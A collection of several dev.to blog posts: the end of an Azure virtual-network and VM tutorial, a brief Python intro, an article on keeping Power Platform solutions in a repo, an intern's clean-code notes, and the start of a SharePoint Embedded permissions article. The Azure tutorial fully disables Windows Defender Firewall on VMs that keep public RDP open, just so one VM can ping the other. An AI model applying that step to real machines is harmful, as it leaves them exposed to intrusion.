![menu](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tuw5esmgoxryd11f4vyz.png)

- Select **Virtual networks** from the sidebar.

![virtual networks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/85qnebix30pl2vws1dsd.png)

- Click **+ Create** at the top of the virtual networks page.

![+Create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5aqo45p951f4q5q6gau6.png)

- On the **Basics** tab, under **Project details** and at the **Resource group** label, click the **Create new** link. Provide a name for the resource group and click **Ok**.

![Basics](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/il1n839ibwjngh0fgrbm.png)

![Create new](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a3e9zaio92rza1pcy45h.png)

- Under the **Instance details** label, provide a **name** for the network and select a suitable **Region**.

![Instance details](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o6ai7qd1y567bah9tydn.png)

- Click the **IP Addresses** tab at the top of the page to add a subnet.

![IP Addresses](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qi39vrjo1wy3h4kqedmn.png)

- In the dropdown menu displayed above the **address space** box on the displayed page, check that the dropdown is set to **Add IPv4 address space**.

![drop-down menu above address space box](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vrjpj8dliysbann6b38u.png)

- In the address space box, set the IPv4 address space to **10.1.0.0/16** (this is usually the default, so you may not need to change it in this instance).

- Locate the pen icon at the bottom corner of the address space box (next to the garbage can icon). Click this icon to edit the default **Subnet** name/add a subnet.

![address space box](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ai4o02hnuoh4ixttpy4h.png)

- Leave the **Subnet Purpose** at **Default**.

![Subnet purpose](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/elln9ojmsnmgjamtchaj.png)

- Change the Subnet **name** to **vnet1-subnet**.

![Change subnet name](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a0jgkebv9oheg858alvv.png)

- Also, change the **Subnet address range** to **10.1.0.0/24** using the **size** label. Leave all other settings as their defaults.

- Click **Add** to close the **Add a Subnet** pane. This completes the creation of the subnet.
![change subnet address range and click add](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sizaykobs8oh6p8ucho7.png)

- Click **Review + create** to run validation.

![Review + create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i56dnr2ouwlfpta855y2.png)

- When you see the notification that validation passed, click the **Create** button to deploy the Virtual Network.

![create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f7khnlfx6sjcsss29zh5.png)

![deployment in progress](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2gox92vsdpfk0kv4d0n1.png)

![deployment is complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gcwfe0wlxmhut5qcsi0v.png)

## STEP 2: CREATE TWO VIRTUAL MACHINES IN THE NETWORK (VIRTUAL NETWORK)

- After the virtual network deployment is complete, click **Go to resource**.

![Go to resource](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xp2o4jv1mycye14d2ago.png)

- Click the hamburger menu button (top left of the page) and select **Virtual machines**.

![menu button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3pf4d71njnncckqwy9n0.png)

![select virtual machines](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9xelx4a1ib0rxnvf7n83.png)

- Click the **+ Create** icon and then select **Virtual machine**.

![create virtual machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5zvode4rzgd6b0vz9oqq.png)

- On the **Basics** tab, under **Project details** and at the **Resource group** label, select the resource group created earlier from the drop-down list of resource groups. This is the deployment ID.

![select the resource group created earlier from the list of resource groups](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pmal872tj7wn36u6ecun.png)

- Under the **Instance details** heading, click the **Virtual machine name** input box and name the virtual machine **vm1**.

![virtual machine name](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/72ials2uxuy6cakjynl6.png)

- At the **Region** label, select a suitable region. In this case, I selected **East US**.

![Region](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nrx0b11rqg2g4ur1b1v9.png)

- Set **Availability options** to **No infrastructure redundancy required**.

![Availability options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vb76vi7olsxs54p5f69v.png)

- Set **Security type** to **Standard**.

![Security type](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4sx89ouwcpiw329m5mor.png)

- At the **Image** label, select **Windows Server 2019 Datacenter - Gen 2**.

![Image](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/by24cubwe7gx9qt2sl9o.png)

- Set **VM architecture** to **x64**.

![VM Architecture](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/50ynlut80i05t8ouxrgu.png)

- Next, untick **Run with Azure spot discount**.

![Run with Azure spot discount](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aftzori572edjvfcz66g.png)

- Then, set **size** to **Standard_Dc4ads_cc_v5..**. At times the size required may not be listed. If this happens, select the **see all sizes** link. This will take you to another page to select a VM size.

![Size](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ou78l9pedrgreghveqge.png)

- Do not **Enable Hibernation**. In my case Hibernation isn't supported for my VM **size**.
![Enable Hibernation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5t6vf4ptr8tmjr2dyugc.png)

- At the **Administrator account** heading, choose a **Username** and **Password**. Also **confirm password** by re-typing the password in the input box at the **confirm password** label. (These are the details that will be required to access the virtual machines when they are in operation.)

![Administrator account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gc4hunm8wzwk6y57bzwd.png)

- At the **Inbound port rules** heading, leave **Public inbound ports** set at the default.

- Set **Select inbound ports** to the default, which is RDP (3389).

![Inbound port rules](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8c3kcp70lf320jq1o62e.png)

- Do not tick the checkbox in the **Licensing** section either.

![Licensing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mitz1hv6dewjtpdenhva.png)

- Click the **Networking** tab at the top of the page. Make sure that **vm1** is placed on the virtual network created earlier, in the **vnet1-subnet** subnet.

- Click **Review + create** to validate the configuration.

![Review + create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xb43xo7kv7v5tmio1c63.png)

- When you see the notification that validation passed, click the **Create** button to deploy the first Virtual Machine.

![deploy virtual machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r7czkgwu5tmlxfzmytzf.png)

![deploying](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ljmp4he22k96k9jeq3k6.png)

![deployment in progress](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hv5ecz9d24wjpna66i50.png)

![deployment complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bcfy48a3sf24dgrxnscz.png)

- Next, create the second virtual machine in the same virtual network following the steps listed under this heading. Make sure the second virtual machine has a different name (e.g. **vm2**) and a different IP address for networking.

## STEP 3: TEST THE CONNECTIONS

- To view the deployed virtual machines, search for virtual machines in the search bar at the top of the page.

- In the listing, click **vm1** to open it.

![Select vm1](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sn4b5lfeewh231m8wv7v.png)

- On the **vm1** overview page, you will notice that the status is *Running*. Click the IP address link at the **Public IP address** label to increase the timeout settings. You can check [here](https://dev.to/tundeiness/setting-up-a-windows-11-virtual-machine-with-azure-on-a-macos-88m) to see how it is done. This is one of the industry's best practices. However, I didn't increase the timeout for my virtual machine in this article.

- Still on the **vm1** overview page, click **Connect** at the top of the page.

![connect](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0dyhydv8owyf4fq3iv7d.png)

- Select **Download RDP file**.

![Download RDP file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/96s3cmi8hjct10pe19p9.png)

- Open the downloaded RDP file for **vm1**.

![Open the downloaded RDP file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vnmg65jylpdpuh9bkf5c.png)

- When prompted, click **Connect**.

- Provide the credentials created for the **administrator account** while creating the **vm1** virtual machine. Provide the **password** and click **Ok**.

![Provide the credentials](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sz7vy4568is6ufiz13i.png)

- You may receive a certificate warning prompt.
Click **Continue** to create the connection to your deployed virtual machine.

![certificate warning prompt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4hewm345yan78xms9196.png)

- Follow the same process listed above to also open **vm2**.

- Now that both virtual machines are open, go to the **vm1** interface. Click the **search** button icon at the bottom of the page.

![search button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5y0xiiz33fep7v7ooeew.png)

- Type *firewall*.

- Select *Windows Defender Firewall* in the search results.

![windows defender firewall](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s5wzhszhnnmv33i751e9.png)

- Click **Turn Windows Defender Firewall on or off**.

![turn Windows Defender Firewall on or off](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vr686ljs5zsab2kkcwj6.png)

- Modify the firewall setting by clicking **Turn off Windows Defender Firewall** for both **Private network settings** and **Public network settings**.

- Click **Ok**.

![Modify the firewall setting](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kz5gho82hrevdjimxjih.png)

![Modify the firewall setting II](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n075z1c2d3o2hsb57cf2.png)

- Disable the firewall for **vm2** just like it was done for **vm1**.

- Next, in **vm1** click the **search** icon at the bottom of the page and search for **PowerShell**.

![search for powershell](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0toc1jcie6a2nv2aekvt.png)

- Select **PowerShell** from the search result listing.

- After PowerShell finishes launching, type **ping vm2** into the interface.

![Ping vm2](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ye303cz1ky2rtohyzu.png)

- If you can see the display in the image below, the connection was successful. I have successfully pinged **vm2** from **vm1**.

![Successful pinging](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/msb4y4xt4t3ac7x1osj5.png)

# CONCLUSION

In this article we have done the following:

- Created a Virtual Network and a Subnet
- Deployed two Virtual Machines onto the virtual network
- Configured them to allow one virtual machine to ping the other within that virtual network, and
- Tested the connection of the two virtual machines in the network.

Another article about virtual networks in Azure can be found [here](https://dev.to/tundeiness/how-to-deploy-a-hub-virtual-network-in-azure-14cj)

Photo by <a href="https://unsplash.com/@theshubhamdhage?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Shubham Dhage</a> on <a href="https://unsplash.com/photos/a-black-and-white-photo-of-a-bunch-of-cubes-gC_aoAjQl2Q?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Unsplash</a>
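As an appendix: the same network from STEP 1 can also be created programmatically, which helps with repeatability. Below is a minimal, illustrative sketch using the `azure-mgmt-network` Python SDK; the subscription ID and resource group are placeholders, and authentication assumes the `azure-identity` package is installed and configured:

```python
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient

# Placeholder values -- substitute your own subscription, resource group and region.
SUBSCRIPTION_ID = "<subscription-id>"
RESOURCE_GROUP = "<resource-group>"
LOCATION = "eastus"

client = NetworkManagementClient(DefaultAzureCredential(), SUBSCRIPTION_ID)

# Create the virtual network with the same address space and subnet as STEP 1.
poller = client.virtual_networks.begin_create_or_update(
    RESOURCE_GROUP,
    "vnet1",
    {
        "location": LOCATION,
        "address_space": {"address_prefixes": ["10.1.0.0/16"]},
        "subnets": [{"name": "vnet1-subnet", "address_prefix": "10.1.0.0/24"}],
    },
)
print(f"Created virtual network: {poller.result().name}")
```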
tundeiness
1,917,993
Python : Intro
On 08.07.2024, I attended an online introductory Python class conducted by the Kaniyam Foundation...
0
2024-07-13T03:21:30
https://dev.to/jokergosha/python-intro-3njm
python, coding
On 08.07.2024, I attended an online introductory Python class conducted by the Kaniyam Foundation.

> The Python programming language is written in a way that is easy to understand.

**Applications of Python:**

- Scripting
- Automating everyday tasks
- Web development
- Data analysis
- Machine learning
- Creating software testing tools
- Developing AI, and more

_In this class, I learned how to install the Python programming language on a computer._
jokergosha
1,918,266
Why your Power Platform Setup Needs a Repo
A Repo (repository) is simply a place to store what you develop. Github is probably the most famous...
20,311
2024-07-15T06:18:04
https://dev.to/wyattdave/why-your-power-platform-setup-needs-a-repo-3eg
powerplatform, powerapps, powerautomate, lowcode
A Repo (repository) is simply a place to store what you develop. GitHub is probably the most famous repository (though it does more than just that), but there are others like Bitbucket, Artifactory and Assembla. Work can be stored as code (editable individual files) or packages (aka artifacts). There are multiple benefits, but the main ones are:

- Source control (different saved versions)
- Redundancy (backup)
- Multi-dev working (split/merge different versions)
- Integrated deployments (Dev/Test/Prod)

So the question you are now asking is: why would I need a repo in the Power Platform? My apps, and now even flows, have version history. Each environment has a copy of the solution, and I store copies when I deploy manually or through Pipelines (a copy of the solution is stored in Dataverse). But there are a few reasons, and it is also easier than you think, so let's dive in.

1. Why - what are the benefits
2. How to set up

---

## 1. Why - what are the benefits

**Connections**

There is one big big problem in the Power Platform, that also happens to be its biggest strength: connections. Connections are great, as you use your own, so there's no messing around setting up SPNs ([Service Principal Names](https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser)). But now we have a problem: they are *your* connections. Which means we really shouldn't be sharing them ([hacked by power automate and how to avoid it](https://dev.to/wyattdave/hacked-by-power-automate-and-how-to-avoid-it-3052)). This is fine in Default on your personal solutions, but what about when it's a business solution?

If you want other devs to be able to update/maintain the flows/apps, you have to give them access to your connections, which not only causes security issues but can cause export issues (if a flow uses a different person's connection reference, you can't see it in the solution, so it will export without it, causing dependency issues).

And this is where a repo comes in: once development is finished, the solution is uploaded to the repo and deleted from the environment. The next dev who needs to work on it simply downloads it and imports it with their own connections.

![repo process](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kajofhk946zbnlojk72x.png)

**Code Consistency**

I have seen far too often a solution deployed to prod, and the developer then 'tinkers' with the dev version, trying new things out. They stop and forget; when a new update is required, these unlogged changes cause unexpected behaviour and bugs. Or, on the flip side, there is a bug in prod and you can't recreate it in dev, as you are actually working on a different version. Again, going to the repo ensures you are always working off the right version.

**House Keeping**

Dev environments can get very, very messy very quickly. They can become hard to navigate and monitor. Not to forget that it is all stored in Dataverse, where we have limited capacity (and it is not cheap to buy more). One solution is to burn the environment (delete after x days), and this is a good solution, but it means you need a repo even more, else solutions could be lost. Storing in a repo keeps your dev environment tidy and will most likely save you money in the long run.

**Back ups**

Although Power Platform environments do have recovery backups, it is good practice to diversify your storage. Storing on different platforms ensures you do not lose your data if any accidents/disasters happen.
It also helps from personal errors (A dev deletes a solution by mistake, a environment rollback would then wipe any other developers work since back up).   ![backups](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0cv2x2mxvqh9i199hvps.png) --- ## 2. How to setup There are 2 main ways to store your solution, as code or as an artifact. If you want to go the code route then for Power Apps you would need to use the Git version control (its been in experimental for 2 years+ now) that integrates directly with Github, I wont go into this as there is good documentation [here](https://learn.microsoft.com/en-us/power-apps/maker/canvas-apps/git-version-control). For Power Automate you have more options as at its core it is row in a Dataverse table ([workflows](https://learn.microsoft.com/en-us/power-apps/developer/data-platform/reference/entities/workflow)), so you can store it in any database. You would also need to do the same for Connection Referenes, Environment Variables and other components. All do-able (Ive gone into detail whats in a solution [here](https://dev.to/wyattdave/everything-you-didnt-know-you-needed-to-know-about-power-platform-solutions-1b4)), but I would strongly recommend going with the easier artifact approach. In this approach we let the Power Platform do all the packing and we just download the completed zip file with everything we need. As we are just storing a zip file it can be anywhere, so the easy one is obviously SharePoint, but if you want to do it properly I would still recommend somewhere like Artifactory. The Dataverse api has the [ExportSolution Action](https://learn.microsoft.com/en-us/power-apps/developer/data-platform/webapi/reference/exportsolution?view=dataverse-latest) which creates the solution export. You pass in some key information and it returns the zip file. So its easy to integrate with pro code solutions, but the easier way is to leverage Power Automate and the Dataverse Unbound Action (which calls the same api). The below example exports the solution and creates an item in a SharePoint list. It stores some key information and a unique reference (run Guid). It then attaches the export to the item. ![export flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xo7btkuq4i9mug3texmw.png) This can be called when needed (like when dev finishes for the he day), on a schedule, or during the deployment process. ![trigger options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eqc13c29er56zpudb1k2.png) --- Repos can be thought of another 'burden' to maintain, with a 'its low code so I dont need pro code processes approach' or 'Its all do before me by Microsoft', but what we should really be looking at is the value. If the solution has high value, then we need to be risk adverse, and this is when established pro code processes like ALM (Application Lifecycle Management) and repos come in (why re-invet the wheel).
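For pro-code teams, here is roughly what calling that ExportSolution action directly could look like. This is a minimal sketch rather than a production implementation: it assumes Node 18+ (for the built-in `fetch`), that a valid bearer token for the environment is available in `DATAVERSE_TOKEN`, and that the org URL and API version are adjusted to your tenant.

```ts
// Sketch: export a solution zip via the Dataverse ExportSolution action.
const ORG_URL = "https://yourorg.crm.dynamics.com"; // hypothetical environment URL
const ACCESS_TOKEN = process.env.DATAVERSE_TOKEN!;  // assumed to be provided beforehand

async function exportSolution(solutionName: string): Promise<Buffer> {
  const response = await fetch(`${ORG_URL}/api/data/v9.2/ExportSolution`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Authorization: `Bearer ${ACCESS_TOKEN}`,
    },
    body: JSON.stringify({ SolutionName: solutionName, Managed: false }),
  });
  if (!response.ok) throw new Error(`Export failed: ${response.status}`);

  // The action returns the zip as a base64 string in ExportSolutionFile.
  const { ExportSolutionFile } = (await response.json()) as {
    ExportSolutionFile: string;
  };
  return Buffer.from(ExportSolutionFile, "base64"); // ready to push to your repo
}
```

From there the buffer can be written to disk and committed to GitHub, pushed to Artifactory, or attached to a SharePoint item, exactly as in the flow-based approach.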
wyattdave
1,918,273
Clean Coding research
Jul 10th Internship journal: Today, I researched about the basic concepts of clean coding, a term...
28,067
2024-07-10T10:33:52
https://dev.to/dongdiri96/clean-coding-1787
**Jul 10th Internship journal:** Today, I researched the basic concepts of clean coding, a term that refers to code written with high readability and efficiency. The team could potentially use this introductory information when designing the website we will create. For better understanding, I tried to read Robert C. Martin's original book. However, lacking background knowledge, the later parts (like data structures, boundaries, and unit tests) were hard to grasp, and thus could not be included in the summary. I felt the vital need to do further research to effectively contribute to the project.

**Jul 12th** Today I researched static program analysis and looked at some example tools that support it.

## What is Clean Code?

Clean code is a term used by the American programmer Robert C. Martin in his book of the same name; it refers to code that is clear, concise, and easy to understand. It is a very important concept in software development because it improves the readability, maintainability, and efficiency of code.

## Why do we need clean code?

Because other people can easily understand and modify the code, teamwork becomes smooth and effective. Also, when code is easy to understand, bugs are much easier to find and fix. In the long run this saves a lot of development cost and greatly improves the team's productivity.

## Principles of Clean Coding

Let's look at a few principles of clean coding, each with a simple example.

**1. Name things precisely**

The name of a variable, function, or class should make clear exactly why it exists and what role it plays.

```
def c(a, b):
    s = 0
    for i in range(a, b + 1):
        s += i
    return s

x = 1
y = 10
result = c(x, y)
print(result)
```

```
def calculate_sum_of_range(start, end):
    total_sum = 0
    for number in range(start, end + 1):
        total_sum += number
    return total_sum

start_number = 1
end_number = 10
sum_result = calculate_sum_of_range(start_number, end_number)
print(sum_result)
```

The second snippet is much easier to understand than the first, because the names of its methods and variables clearly state their roles and reasons for existing.

**2. Keep functions simple**

A function should do only one thing. It is recommended that a function not exceed 20 lines.

```
def process_data(data):
    filtered_data = [item for item in data if item['value'] > 10]
    sorted_data = sorted(filtered_data, key=lambda x: x['value'])
    transformed_data = [{'id': item['id'], 'value': item['value'] * 2} for item in sorted_data]
    for item in transformed_data:
        print(f"ID: {item['id']}, Value: {item['value']}")
```

This function performs no fewer than four tasks; each of them should be extracted into its own function.

**3. Don't overuse comments**

Don't write a comment unless it marks a copyright, explains a function that is hard to understand, clarifies intent, or serves as a warning.

```
// Returns an instance of the Responder being tested.
protected abstract Responder responderInstance();
```

```
// Don't run unless you
// have some time to kill.
public void _testWithReallyBigFile() {
    writeLinesToFile(10000000);
    response.setBody(testFile);
    response.readyToSend(this);
    String responseString = output.toString();
    assertSubString("Content-Length: 1000000000", responseString);
    assertTrue(bytesSent > 1000000000);
}
```

The first snippet carries a comment for explanation, the second one for warning. These are the kinds of comments that can be called good.

**4. Keep the structure tidy**

The book explains vertical and horizontal structure. Vertically, arrange code like a newspaper, ordered from most to least important, and define variables as close as possible to where they are used. Horizontally, keep code from running off the screen, and always indent, whether a block is short or long - that is what makes code clean.

**5. Follow the Law of Demeter**

The Law of Demeter states that an object should not depend on the internal details of other objects and should interact with them only through the interfaces they provide.

```
class Engine {
    public void start() {
        System.out.println("Engine started");
    }
}

class Car {
    private Engine engine;

    public Car() {
        this.engine = new Engine();
    }

    public Engine getEngine() {
        return engine;
    }
}

class Driver {
    public void startCar(Car car) {
        car.getEngine().start();
    }
}

public class Main {
    public static void main(String[] args) {
        Car car = new Car();
        Driver driver = new Driver();
        driver.startCar(car);
    }
}
```

Here, the Law of Demeter is violated because the driver knows about the car's internal structure (the engine).
```
class Engine {
    public void start() {
        System.out.println("Engine started");
    }
}

class Car {
    private Engine engine;

    public Car() {
        this.engine = new Engine();
    }

    public void startEngine() {
        engine.start();
    }
}

class Driver {
    public void startCar(Car car) {
        car.startEngine();
    }
}

public class Main {
    public static void main(String[] args) {
        Car car = new Car();
        Driver driver = new Driver();
        driver.startCar(car);
    }
}
```

This version can be called clean code, because Driver no longer needs to know anything about the car's internals.

**6. Replace error codes with exceptions**

```
class FileReader {
    public void readFile(String filePath) throws FileNotFoundException {
        if (filePath == null) {
            throw new FileNotFoundException("File path is null");
        }
        System.out.println("Reading file: " + filePath);
    }
}

public class Main {
    public static void main(String[] args) {
        FileReader fileReader = new FileReader();
        try {
            fileReader.readFile(null);
            System.out.println("File read successfully");
        } catch (FileNotFoundException e) {
            System.out.println("Error: " + e.getMessage());
        }
    }
}
```

This code is cleaner because, when an error occurs, it immediately throws a FileNotFoundException instead of returning something like -1.

On a related note, let's also look at the SOLID principles, which are essential for clean object-oriented programming.

**S (Single responsibility):** Just like functions, a class should have only one responsibility.

**O (Open-closed):** Code should be open for extension but closed for modification.

**L (Liskov substitution):** Everything a base class can do, a derived class must also be able to do. The rectangle and square below are the classic example used to explain this principle.

```
class Rectangle {
    protected int width;
    protected int height;

    public void setWidth(int width) {
        this.width = width;
    }

    public void setHeight(int height) {
        this.height = height;
    }

    public int getWidth() {
        return width;
    }

    public int getHeight() {
        return height;
    }

    public int getArea() {
        return width * height;
    }
}

class Square extends Rectangle {
    @Override
    public void setWidth(int width) {
        this.width = width;
        this.height = width;
    }

    @Override
    public void setHeight(int height) {
        this.width = height;
        this.height = height;
    }
}

public class Main {
    public static void main(String[] args) {
        Rectangle rectangle = new Rectangle();
        rectangle.setWidth(5);
        rectangle.setHeight(10);
        System.out.println("Rectangle area: " + rectangle.getArea());

        Rectangle square = new Square();
        square.setWidth(5);
        square.setHeight(10);
        System.out.println("Square area: " + square.getArea());
    }
}
```

Because this code violates the LSP, the square's area is calculated incorrectly. To fix it, Rectangle and Square should be separate classes that implement the same interface.

```
interface Shape {
    int getArea();
}

class Rectangle implements Shape {
    protected int width;
    protected int height;

    public Rectangle(int width, int height) {
        this.width = width;
        this.height = height;
    }

    public int getWidth() {
        return width;
    }

    public int getHeight() {
        return height;
    }

    @Override
    public int getArea() {
        return width * height;
    }
}

class Square implements Shape {
    private int side;

    public Square(int side) {
        this.side = side;
    }

    public int getSide() {
        return side;
    }

    @Override
    public int getArea() {
        return side * side;
    }
}

public class Main {
    public static void main(String[] args) {
        Shape rectangle = new Rectangle(5, 10);
        System.out.println("Rectangle area: " + rectangle.getArea());

        Shape square = new Square(5);
        System.out.println("Square area: " + square.getArea());
    }
}
```

**I (Interface segregation):** A client should not be forced to depend on interfaces it does not use.
```
interface Worker {
    void work();
}

interface Eater {
    void eat();
}

class Human implements Worker, Eater {
    @Override
    public void work() {
        System.out.println("Human is working");
    }

    @Override
    public void eat() {
        System.out.println("Human is eating");
    }
}

class Robot implements Worker {
    @Override
    public void work() {
        System.out.println("Robot is working");
    }
}
```

Because Worker and Eater are defined separately here, Robot no longer has to implement an unnecessary eat method.

**D (Dependency Inversion):** High-level modules should not depend on low-level modules.

Beyond these, there are more complex principles related to design and systems. Code that does not cause bugs but is hard to maintain because it ignores these principles is called a code smell, and a variety of tools exist to detect such smells.
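Dependency Inversion is the only principle above without a sample, so here is a minimal sketch of the idea (written in TypeScript for brevity; all names are illustrative, and the point carries over directly to Java or Python):

```ts
// A high-level module (ReportService) depends on an abstraction (ReportStore),
// not on a concrete low-level module (FileStore).
interface ReportStore {
  save(data: string): void;
}

class FileStore implements ReportStore {
  save(data: string): void {
    console.log(`Saving to file: ${data}`);
  }
}

class ReportService {
  constructor(private store: ReportStore) {} // dependency injected via constructor

  publish(report: string): void {
    this.store.save(report);
  }
}

new ReportService(new FileStore()).publish("monthly report");
```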
dongdiri96
1,918,532
Mastering Application Permissions in SharePoint Embedded
In the previous article, Containers and Files Security in SharePoint Embedded, we explored the power...
26,993
2024-07-16T06:30:00
https://intranetfromthetrenches.substack.com/p/application-permissions-in-sharepoint-embedded
sharepoint
In the previous article, [Containers and Files Security in SharePoint Embedded](https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded), we explored the power of content permissions for controlling access to container data. But security in SharePoint Embedded goes beyond just files and containers. Applications themselves play a crucial role in managing access and functionalities.

![Man reading content of a filing cabinet by National Cancer Institute from Unsplash](https://substackcdn.com/image/fetch/w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6c7f5d60-0aa7-4084-91ab-dc3dfd09d163_2112x1344.png)

This article dives deeper into the world of SharePoint Embedded application permissions. We'll uncover the different types of applications, how they interact with permissions, and the various roles you can define for granular control. By understanding these concepts, you'll be well equipped to build secure and scalable solutions that empower your users within SharePoint.

## Understanding Applications

Applications in SharePoint Embedded act as your tools for managing content and containers. Each application requires a Microsoft Entra ID identity, ensuring a secure environment. Additionally, applications need specific Microsoft Graph permissions to call the corresponding endpoints. There are two main types of applications, each playing a distinct role:

- **Owning Application:** This application acts as the leader, directly linked to a container type. It's responsible for creating both the container type and its individual containers. Imagine it as the architect, designing the blueprints and laying the foundation. It also has complete control over these containers and their content.
- **Guest Application:** As the name suggests, this application focuses on managing the content that lives inside containers. Think of it as the interior designer, arranging and presenting the content within the established structure.

## Knowing Tenants

The concept of tenants is crucial when working with SharePoint Embedded applications. Tenants are essentially the spaces where you build your solutions on top of containers. Here's a breakdown of the two key tenants:

- **Development Tenant:** This is your starting point. Here, you'll create and configure your Container Type and assign the owning application.
- **Consuming Tenant:** This is the end point. This is where the Container Type is used and where containers are created. All data lives under the consuming tenant's scope.

## Defining Permissions

Permissions in SharePoint Embedded allow you to delegate control over different aspects of your solutions to applications. They can be combined to create various user roles and organize user actions effectively. Here's a breakdown of the permission sets available, categorized by their scope:

- **Content:**
  - **ReadContent:** Allows applications to read existing content within containers.
  - **WriteContent:** Allows applications to write content (files) to containers.
- **Container:**
  - **Create:** Allows applications to create new containers.
  - **Delete:** Allows applications to delete containers.
  - **Read:** Allows applications to read container metadata.
  - **Write:** Allows applications to update container metadata.
- **Permission Management:**
  - **EnumeratePermissions:** Allows applications to list container members and their roles.
  - **AddPermissions:** Allows applications to add new members to containers.
  - **UpdatePermissions:** Allows applications to change the role of existing members in the container.
  - **DeletePermissions:** Allows applications to remove members from containers (excluding itself).
  - **DeleteOwnPermissions:** Allows applications to remove themselves from container permissions.
  - **ManagePermissions:** Allows applications to perform all permission-related actions (add, update, remove, including itself).

There are two additional special permissions to be aware of:

- **None:** The application has no access to containers.
- **Full:** The application has all available permissions (use with caution).

## Roles

This table provides a basic framework for defining roles with specific access levels to container content and management. You can adapt these roles further based on your specific needs and security requirements.

- **Viewer:** Can only view the content and basic metadata of containers.
- **Contributor:** Can view, create, edit, and delete the content of containers and read the container metadata.
- **Editor:** Can view, create, and edit content, manage basic container metadata, and see who has access to the container.
- **Administrator:** Has full control over containers, including managing content, metadata, and permissions of other users.
- **Auditor:** Can view container metadata and list members with their roles, but cannot access content.
- **Content Manager:** Can view and modify the content of containers, but cannot create, delete, or manage container metadata or permissions.
- **Container Manager:** Can create and delete containers, as well as view and edit their metadata. Cannot manage content or permissions.
- **Permission Manager:** Can manage permissions for containers, including adding, removing, and modifying user roles. Cannot access content or container metadata.

![SharePoint Embedded Applications Permissions Table](https://substackcdn.com/image/fetch/w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f0d6702-b075-43fd-95e5-394e866f913c_800x400.png)

## A Real-World Example

Let's imagine our business is an art gallery and we want to leverage SharePoint Embedded to build a solution. We want a system for artists to manage their artworks, a jury to evaluate submissions, and a public platform to showcase the art. While it's possible to build everything into one app, we can leverage SharePoint Embedded's features to create a more secure and manageable solution with separate applications:

1. **Artist Portfolio:** This artist-facing application allows artists to view submitted artworks, track performance metrics, and update their profiles.
2. **Curatorial Review App:** A secure application for jury members to review submissions, leave feedback, and manage roles (for administrators).
3. **Public Artwork Gallery Website:** This website showcases the artwork available in the gallery. Users can browse submissions, view artist biographies, and potentially initiate purchases (without write access for this application). There wouldn't be a need for the public website to modify any content within SharePoint.

### Assigning Permissions for Secure Access Control

Each application in this scenario will have a designated role within the SharePoint Embedded architecture:

- **Artist Portfolio App:** This application requires `ReadContent` and `WriteContent` permissions. Artists can upload their works, view existing submissions, and update their profiles. Additionally, if the solution allows new artist registration, permissions like `Create`, `Read`, and `Update` might be needed for managing their own containers.
